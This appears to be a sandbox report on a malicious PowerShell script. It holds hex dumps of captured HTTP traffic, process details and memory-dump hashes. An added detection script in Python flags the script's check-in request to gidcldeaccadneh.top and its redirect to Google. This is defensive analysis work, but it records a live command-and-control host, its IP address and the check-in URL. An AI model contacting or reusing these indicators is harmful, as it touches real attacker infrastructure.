Nov 15, 2024 09:34:07.037592888 CET | 1289 | IN | Data Raw: 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e
                                                                                                Data Ascii: elp you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/logos/doodles/2024/celebrating-the-kayak-675365183711058
Nov 15, 2024 09:34:07.037653923 CET | 1289 | IN | Data Raw: 35 35 36 2c 34 33 2c 31 33 2c 33 2c 31 2c 34 33 2c 32 2c 34 2c 31 2c 36 2c 35 2c 34 37 2c 31 2c 35 2c 34 2c 31 2c 36 2c 31 2c 36 2c 31 2c 36 2c 31 2c 38 2c 31 2c 36 2c 35 2c 32 2c 31 2c 34 35 2c 31 30 2c 31 2c 31 2c 31 2c 31 2c 31 2c 31 2c 32 37
                                                                                                Data Ascii: 556,43,13,3,1,43,2,4,1,6,5,47,1,5,4,1,6,1,6,1,6,1,8,1,6,5,2,1,45,10,1,1,1,1,1,1,27995704,2169859,23034775,2739,4636,16436,49022,35023,11640,7668,6,3308,885,14280,8181,5934,43496,19011,2663,3431,3319,1906,2,21971,9139,4599,328,4456,1769,1116,56
Nov 15, 2024 09:34:07.037708998 CET | 1289 | IN | Data Raw: 32 33 31 2c 37 31 37 31 30 36 33 27 2c 6b 42 4c 3a 27 5a 56 42 34 27 2c 6b 4f 50 49 3a 38 39 39 37 38 34 34 39 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3b 28 28 61 3d 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 29 3d 3d 6e 75 6c 6c 3f
                                                                                                Data Ascii: 231,7171063',kBL:'ZVB4',kOPI:89978449};(function(){var a;((a=window.google)==null?0:a.stvsc)?google.kEI=_g.kEI:window.google=_g;}).call(this);})();(function(){google.sn='webhp';google.kHL='en';})();(function(){var h=this||self;function l(){re
Nov 15, 2024 09:34:07.037754059 CET | 1289 | IN | Data Raw: 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 67 3d 6e 2e 6c 65 6e 67 74 68 3b 6e 5b 67 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6e 5b
                                                                                                Data Ascii: =new Image;var g=n.length;n[g]=a;a.onerror=a.onload=a.onabort=function(){delete n[g]};a.src=c}};google.logUrl=function(a,b){b=b===void 0?l:b;return t("",a,b)};}).call(this);(function(){google.y={};google.sy=[];var d;(d=google).x||(d.x=function
Nov 15, 2024 09:34:07.037796021 CET | 1289 | IN | Data Raw: 29 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67
                                                                                                Data Ascii: );}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transpare
Nov 15, 2024 09:34:07.037836075 CET | 1289 | IN | Data Raw: 7d 2e 67 62 78 6d 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 63 63 63 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 31 3b 74 6f 70 3a 2d 31 70 78 3b 6c
                                                                                                Data Ascii: }.gbxms{background-color:#ccc;display:block;position:absolute;z-index:1;top:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*r
Nov 15, 2024 09:34:07.037892103 CET | 1289 | IN | Data Raw: 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 2e 67 62 74 73 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69
                                                                                                Data Ascii: play:inline-block;padding:0 5px;position:relative;z-index:1000}.gbts{*display:inline}.gbzt .gbts{display:inline;zoom:1}.gbto .gbts{background:#fff;border-color:#bebebe;color:#36c;padding-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-
Nov 15, 2024 09:34:07.037935972 CET | 1289 | IN | Data Raw: 34 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 70 78 3b 77 69 64 74 68 3a 32 34 70 78 7d 2e 67 62 74 6f 20 23 67 62 69 34 69 2c 2e 67 62 74 6f 20 23 67 62 69 34 69 64 7b 74 6f 70 3a 33 70 78 7d 2e 67 62 69 34 70
                                                                                                Data Ascii: 4px;position:absolute;top:1px;width:24px}.gbto #gbi4i,.gbto #gbi4id{top:3px}.gbi4p{display:block;width:24px}#gbi4id{background-position:-44px -101px}#gbmpid{background-position:0 0}#gbmpi,#gbmpid{border:none;display:inline-block;height:48px;wi
Nov 15, 2024 09:34:07.037981033 CET | 1289 | IN | Data Raw: 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 6c 69 6e 65 2d 68 65 69
                                                                                                Data Ascii: isplay:inline;margin:0;padding:0;white-space:nowrap}.gbmlb,.gbmlb:visited{line-height:27px}.gbmlb-hvr,.gbmlb:focus{outline:none;text-decoration:underline !important}.gbmlbw{color:#ccc;margin:0 10px}.gbmt{padding:0 20px}.gbmt:hover,.gbmt:focus{
Nov 15, 2024 09:34:07.155905962 CET | 1289 | IN | Data Raw: 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 32 30 70 78 7d 23 67 62 6d 70 6c 70 2e 67 62 70 73 7b 6d 61 72 67 69 6e 3a 30 20 31 30 70 78 7d 2e 67 62 70 63 20 2e 67 62 70 73 7b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c
                                                                                                Data Ascii: ck;margin:0 20px}#gbmplp.gbps{margin:0 10px}.gbpc .gbps{color:#000;font-weight:bold}.gbpc .gbpd{margin-bottom:5px}.gbpd .gbmt,.gbpd .gbps{color:#666 !important}.gbpd .gbmt{opacity:.4;filter:alpha(opacity=40)}.gbps2{color:#666;display:block}.gb
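The DNS answers and the two HTTP sessions above record the observable network behaviour of the sample: powershell.exe resolves gidcldeaccadneh.top, requests /hqr7nx0sg1htr.php?id=computer&key=50024904669&s=mints13 over plain HTTP with the default Windows PowerShell user agent (the "WindowsPowerShell/5.1.19041.1151" suffix is what Invoke-WebRequest sends, whatever the "Mozilla/5.0" prefix suggests), receives a 302 to http://www.google.com and follows it, which is why the only 200 OK in the report is the Google front page. The following is an added example, not part of the Joe Sandbox report, of detection logic a SOC could run over such records: it parses each request/response pair, correlates the destination IP with the DNS answers, and flags the PowerShell user agent, the non-allowlisted host, the check-in style query string and the redirect chain, so that the benign-looking Google session is tied back to the session that caused it. The session records are transcribed from the tables above as constructed input; the allowlist, the rule names and the severity levels are assumptions to tune per environment.

```python
"""Detection logic over the HTTP sessions and DNS answers shown in the report.

Input records are transcribed from the report (constructed input for this
example). The allowlist, rule names and severity levels are assumptions.
"""
from urllib.parse import parse_qs, urlsplit

# (name, address) pairs from the DNS answers table above.
DNS_ANSWERS = [
    ("gidcldeaccadneh.top", "206.188.196.37"),
    ("www.google.com", "64.233.185.105"),
]

PS_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151"

HTTP_SESSIONS = [
    {
        "session": 0, "dst_ip": "206.188.196.37", "pid": 7652,
        "request": (
            "GET /hqr7nx0sg1htr.php?id=computer&key=50024904669&s=mints13 HTTP/1.1\r\n"
            f"User-Agent: {PS_UA}\r\n"
            "Host: gidcldeaccadneh.top\r\n"
            "Connection: Keep-Alive\r\n"
        ),
        "response": (
            "HTTP/1.1 302 Found\r\n"
            "Server: nginx/1.18.0 (Ubuntu)\r\n"
            "Content-Length: 0\r\n"
            "Location: http://www.google.com\r\n"
        ),
    },
    {
        "session": 1, "dst_ip": "64.233.185.105", "pid": 7652,
        "request": (
            "GET / HTTP/1.1\r\n"
            f"User-Agent: {PS_UA}\r\n"
            "Host: www.google.com\r\n"
            "Connection: Keep-Alive\r\n"
        ),
        "response": "HTTP/1.1 200 OK\r\nServer: gws\r\nContent-Type: text/html; charset=UTF-8\r\n",
    },
]

# Hosts a PowerShell process is expected to fetch from (assumption; tune per environment).
ALLOWLIST = {"www.google.com", "go.microsoft.com", "www.powershellgallery.com"}
REDIRECT_CODES = {301, 302, 303, 307, 308}


def parse_message(raw):
    """Split an HTTP message into its start line and a dict of lower-cased headers."""
    lines = raw.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if not line:          # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def analyze(sessions, dns_answers, allowlist=ALLOWLIST):
    """Return one finding per session: the rules that fired and an overall severity."""
    ip_to_name = {addr: name for name, addr in dns_answers}
    via_redirect = {}     # host -> host of the earlier session whose redirect pointed here
    findings = []
    for s in sessions:
        req_line, req = parse_message(s["request"])
        resp_line, resp = parse_message(s["response"])
        _method, target, _version = req_line.split(" ", 2)
        status = int(resp_line.split(" ")[1])
        host = req.get("host") or ip_to_name.get(s["dst_ip"], s["dst_ip"])
        ua = req.get("user-agent", "")
        reasons = []

        ps_ua = "WindowsPowerShell/" in ua      # default Invoke-WebRequest user agent
        if ps_ua:
            reasons.append("default PowerShell user agent")
        if host not in allowlist:
            reasons.append("host not allowlisted")
        resolved = ip_to_name.get(s["dst_ip"])
        if resolved and resolved != host:        # Host header vs. what the DNS answer said
            reasons.append(f"Host header {host} does not match DNS name {resolved}")
        params = parse_qs(urlsplit(target).query)
        checkin = {"id", "key"}.issubset(params)  # id=...&key=... style check-in parameters
        if checkin:
            reasons.append("check-in style query: " + ",".join(sorted(params)))
        if status in REDIRECT_CODES and "location" in resp:
            loc_host = urlsplit(resp["location"]).hostname
            if loc_host and loc_host != host:
                reasons.append(f"redirected to {loc_host}")
                via_redirect[loc_host] = host
        if host in via_redirect:
            reasons.append(f"reached via redirect from {via_redirect[host]}")

        if ps_ua and (host not in allowlist or checkin):
            severity = "alert"
        elif ps_ua or host in via_redirect:
            severity = "info"   # benign-looking traffic that only exists because of the redirect
        else:
            severity = "none"
        findings.append({"session": s["session"], "pid": s["pid"], "host": host,
                         "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(HTTP_SESSIONS, DNS_ANSWERS):
        print(f"session {f['session']} {f['host']}: {f['severity']} ({'; '.join(f['reasons'])})")
```

Run stand-alone, the block reports session 0 as an alert (PowerShell user agent, non-allowlisted host, id/key/s query, redirect to www.google.com) and session 1 as informational, carrying the note that www.google.com was reached only by following the redirect from gidcldeaccadneh.top. The redirect correlation is what keeps the Google session from being dismissed as noise, and the Host-vs-DNS check catches the case, absent here, where a Host header is set to something other than the name that was resolved.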


Target ID: 0
Start time: 03:34:01
Start date: 15/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ryOpDCeOHz.ps1"
Imagebase: 0x7ff6c3980000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 03:34:01
Start date: 15/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff778180000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 229084ac625cb6752b0fac223475f5aa7e753c773c21edfb2a15a7ace9f8263c
                                                                                                  • Instruction ID: 691b0ae579be170d7020fac569b4924684f844816a047676ac578daacfa67b71
                                                                                                  • Opcode Fuzzy Hash: 229084ac625cb6752b0fac223475f5aa7e753c773c21edfb2a15a7ace9f8263c
                                                                                                  • Instruction Fuzzy Hash: E6F19330A09B8D8FEBA8DF28CC567E977E1FF55310F04426AE84DC7291DB34A9459B81
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 90a14469c36c032f1abaf82a4a4c4e1ed705b6a7f4c0813df858e26eb2ae2ca3
                                                                                                  • Instruction ID: 851fe83ba6252f023b961240a9335dc9aac3042b8fa3dd877caf901fcab7e6d2
                                                                                                  • Opcode Fuzzy Hash: 90a14469c36c032f1abaf82a4a4c4e1ed705b6a7f4c0813df858e26eb2ae2ca3
                                                                                                  • Instruction Fuzzy Hash: EEE1C730A0DA4D8FEBA8DF28C8567E977E1FF55310F14426ED88DC72A1CE74A8459B81
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: df183cf8561d6438daaf2d7fa794ad8d8c5f3aec6dcd1ede2916745f9b8b24da
                                                                                                  • Instruction ID: b719fed27ee985e5fff4601b588d43fe48174c18e76f790c1c69b168ac10ec5a
                                                                                                  • Opcode Fuzzy Hash: df183cf8561d6438daaf2d7fa794ad8d8c5f3aec6dcd1ede2916745f9b8b24da
                                                                                                  • Instruction Fuzzy Hash: 30D18030A08A4D8FDF99DF6CC455AA9BBF1FFA9310F14416AD449D7296CA24E881DBC0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e8bcd2948d5fa4637924c9db2bb6b70715d62e2c20fd9878cc8f503dcb6fa072
                                                                                                  • Instruction ID: a3b3290ed3ddc2fce3d8b659e8d646c8950c5aab442e1dc9be39061b326e2bd4
                                                                                                  • Opcode Fuzzy Hash: e8bcd2948d5fa4637924c9db2bb6b70715d62e2c20fd9878cc8f503dcb6fa072
                                                                                                  • Instruction Fuzzy Hash: 07B1B63060DB8D4FEBA9DF28C8567E97BE1EF55310F04426EE88DC7291CA349945DB82
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.6055805029.00007FFD3AF4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3AF4D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3af4d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2c2e84bcc1047a290df7fd0fbd6c7ee544703e9f16e9d4bd7ad14531ae3a0f1c
                                                                                                  • Instruction ID: ec4114145711b738ccb19d645684f138bccf16eb2caaeab5d710c528a1fcfbba
• Opcode Fuzzy Hash: 2c2e84bcc1047a290df7fd0fbd6c7ee544703e9f16e9d4bd7ad14531ae3a0f1c
• Instruction Fuzzy Hash: 20413B3060DBC44FE75A8B2CDC55A923FF0EF56324B1506EFE088CB1A3D625A846C792
Memory Dump Source
• Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 23dd5ea0d418c633ec17b7178f77069535e168cb2521e4876c9a53986fd70932
• Instruction ID: 9656b0109d061cf360f07cc18155b6657f58816cd80202ae4e5fd1fcde2f5d8f
• Opcode Fuzzy Hash: 23dd5ea0d418c633ec17b7178f77069535e168cb2521e4876c9a53986fd70932
• Instruction Fuzzy Hash: AD31C571A1CB4C9FDB189F5C984A6A9BBE0FB99311F00426FE449C3252DB70A8558BC2
Memory Dump Source
• Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 455f54167810e986e3300becf833c353cd79103448ea11223b89aa9a87fbf52a
• Instruction ID: 1cd02538347c1275c91627863ab6f9dd1e4d55ef34f0bac12243497280fb988a
• Opcode Fuzzy Hash: 455f54167810e986e3300becf833c353cd79103448ea11223b89aa9a87fbf52a
• Instruction Fuzzy Hash: 6C210A3190CB4C4FEB59DFAC9C4A7E97BE0EB96321F04426FD048C3152DA74981ACB51
Memory Dump Source
• Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c5ac1ef3f4a96a415415554df401732aa3cc8304f19c792d9124e1c98779c8f2
• Instruction ID: 9dde927dbcca83061cd24c0eed393b8d1bfece414aa912f02e896b30fb609fa3
• Opcode Fuzzy Hash: c5ac1ef3f4a96a415415554df401732aa3cc8304f19c792d9124e1c98779c8f2
• Instruction Fuzzy Hash: 83314F30A1A65E8EFBB89F15CC6ABF97290FF42314F404138D58D860A2DF386945EB12
Memory Dump Source
• Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 74c5df7715b7d009bf0b2654a772609c5eb0b53b120d07d8475d6608dc7228b5
• Instruction ID: c56a79183bb6812d19f27c569f9b9aef042e060abeb188bdec576c66832e687c
• Opcode Fuzzy Hash: 74c5df7715b7d009bf0b2654a772609c5eb0b53b120d07d8475d6608dc7228b5
• Instruction Fuzzy Hash: 1C01677121CB0C4FD748EF4CE452AA5B7E0FB99324F10056EE58AC3661DA36E892CB45
Memory Dump Source
• Source File: 00000000.00000002.6061359052.00007FFD3B310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B310000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd3b310000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bb134d38695a347be197176e9c9963fdfa0710ddaa8da1daba4aa653221ce86f
• Instruction ID: 0caec8ef0a94ed144545cfdb5d45d808ca2aceddfd721dc5093896ee66abc340
• Opcode Fuzzy Hash: bb134d38695a347be197176e9c9963fdfa0710ddaa8da1daba4aa653221ce86f
• Instruction Fuzzy Hash: 58F01D32B0D9544FD759BB48E4515A873E0EF46320B1410F6E15DC7563DA25EC01C744
Memory Dump Source
• Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d93cd0a0bf1041d544b62a9297df30e678a47a202fdf650ebc88dfc7ec20e96c
• Instruction ID: 731a8f2c5c8f12af09ee1e09eb85052f5da8d103892cdb24b4ae77348cfff986
• Opcode Fuzzy Hash: d93cd0a0bf1041d544b62a9297df30e678a47a202fdf650ebc88dfc7ec20e96c
• Instruction Fuzzy Hash: 09F0F63180C6CD8FDB069F388C664D4BFA0EF27210B0502DAD448C70A2DA649558CBD2
Memory Dump Source
• Source File: 00000000.00000002.6061359052.00007FFD3B310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B310000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd3b310000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6748c6b539d9e3799cfd6b53bd2abb2ba0fb02aff1cfba85c0494c3a8de0d22a
• Instruction ID: 4ca8d7e929cac41bc852b7471264489951e43a7268675b3c7c2bc36e1aafa859
• Opcode Fuzzy Hash: 6748c6b539d9e3799cfd6b53bd2abb2ba0fb02aff1cfba85c0494c3a8de0d22a
• Instruction Fuzzy Hash: CDF03A32B0D9548FDB98BB88E4514E877E4EF06320B5410F6E15DCB463DB25EC41C740
Strings
Memory Dump Source
• Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
Similarity
• API ID:
• String ID: 0/;
• API String ID: 0-2887988655
• Opcode ID: 2d57f0b912ae618e5b72b271d96dc12e9885eccc9ab5f2bd77a46e8a4c4b0419
• Instruction ID: e339730c2dfd11f65969e25eed95554fd6ca0c4fc860072c07a880451694b8bb
• Opcode Fuzzy Hash: 2d57f0b912ae618e5b72b271d96dc12e9885eccc9ab5f2bd77a46e8a4c4b0419
• Instruction Fuzzy Hash: 65421B33B0D6964FEBA6DB1CC4B66E93BA0EF56310B0501BBC1C9D7193DE25A842D781
Strings
Memory Dump Source
• Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
Similarity
• API ID:
• String ID: @8_
• API String ID: 0-3079568424
• Opcode ID: 004ec2b99400c18c91c68749ae1026c701fbf4ebdb04779a00f389706141cc09
• Instruction ID: fa81330cc9a38699f1045e7b2fa724060070eed0c02e55abeaa7ff87824fc681
• Opcode Fuzzy Hash: 004ec2b99400c18c91c68749ae1026c701fbf4ebdb04779a00f389706141cc09
• Instruction Fuzzy Hash: 06F1E853B0F6D65FE7769A3C98B62E57F90DF93224B0901F7C1C88E0A3DD186846A352
Memory Dump Source
• Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dc4295da80893b79011a55e921637ad6018ee76f892e73942a479fb771e1633a
• Instruction ID: 55a4449e16f2f34a3168de0b3365fd4590678fd384ea67c74f8460b63f1bd16d
• Opcode Fuzzy Hash: dc4295da80893b79011a55e921637ad6018ee76f892e73942a479fb771e1633a
• Instruction Fuzzy Hash: 04C18653B0E7D24BE7136A6C9CB70E57F60DF9326574A01F7C1C4CB0A3D919684BA262
Memory Dump Source
• Source File: 00000000.00000002.6060891046.00007FFD3B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B2D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd3b2d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 98534e838fe9b0adbe02e6714ffea92e3dfe247b7bae5cdf8f5b25e826f75c79
• Instruction ID: df4015327c7c987d2bb9b51407c46a68ee4f2e54414311d13357a001a7501e7c
• Opcode Fuzzy Hash: 98534e838fe9b0adbe02e6714ffea92e3dfe247b7bae5cdf8f5b25e826f75c79
• Instruction Fuzzy Hash: 12917932A0FA8D4FD7969B7898A45A57BE0EF56320B0402FFD49CC70A3DE289D05C352
Memory Dump Source
• Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f183e2743e208e065993dc936e912c80ea35060ecd0363531a8d741cb924fa8b
• Instruction ID: f4afe511cafc8eb57927105f64ab7a4044f166e324dbf2cbf82f1857aac6e10f
• Opcode Fuzzy Hash: f183e2743e208e065993dc936e912c80ea35060ecd0363531a8d741cb924fa8b
• Instruction Fuzzy Hash: 39719F57F0F6D24FE712866898761E9BFA0EF5322570A01F7C5C48F4A3DA1D2806B761
Strings
Memory Dump Source
• Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
Similarity
• API ID:
• String ID: @;$0@;$8@;$@@;$WL_I$XL_I$X@;$X@;$`@;$h@;$pN/;$x@;$@;
• API String ID: 0-481145736
• Opcode ID: f011fd779186b0de5e94510108b491bf8b06aaed20afeec2587fc6876fd32e82
• Instruction ID: f681cc302be899756b1b73477994c6dcbcdce75578c59343b3931869db38863a
• Opcode Fuzzy Hash: f011fd779186b0de5e94510108b491bf8b06aaed20afeec2587fc6876fd32e82
• Instruction Fuzzy Hash: 8A713963F0FAC90FE6A5451C28372796B81EF9326075845FBD1D8870EBEC05AC0AA685
Strings
Memory Dump Source
• Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
Similarity
• API ID:
• String ID: 0@;$P@;$_$x@;$@;$@;
• API String ID: 0-915576283
• Opcode ID: 1980be5a482838ab551023b5443123860c469ed1f2d6122f8188f4eb8da8393a
• Instruction ID: 32779dd73755c246f864d649ab6afc3673e3e9ad93d3cb2a599d6951da00d88a
• Opcode Fuzzy Hash: 1980be5a482838ab551023b5443123860c469ed1f2d6122f8188f4eb8da8393a
• Instruction Fuzzy Hash: 98A1AF13B0D5924EE726BBBCB8661FC7B60DFD3376B0044B7D2C48A0A78D24584A97D6
Strings
Memory Dump Source
• Source File: 00000000.00000002.6056426367.00007FFD3B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3B060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd3b060000_powershell.jbxd
Similarity
• API ID:
• String ID: L_^$L_^$L_^$L_^
• API String ID: 0-2357752022
• Opcode ID: f0549fc14f1daa6b03bb0893fb42968faff54b678705fcfe54c6903e8a8a3098
• Instruction ID: 70286978a3b4533b2f91c2a1be525e87120eece57593e83b9869ee08398f9f76
• Opcode Fuzzy Hash: f0549fc14f1daa6b03bb0893fb42968faff54b678705fcfe54c6903e8a8a3098
• Instruction Fuzzy Hash: B0513EA2A0E7C25FE7435B3958F62947FB0EF6721474D01FBC1C44A0A3ED64581AA726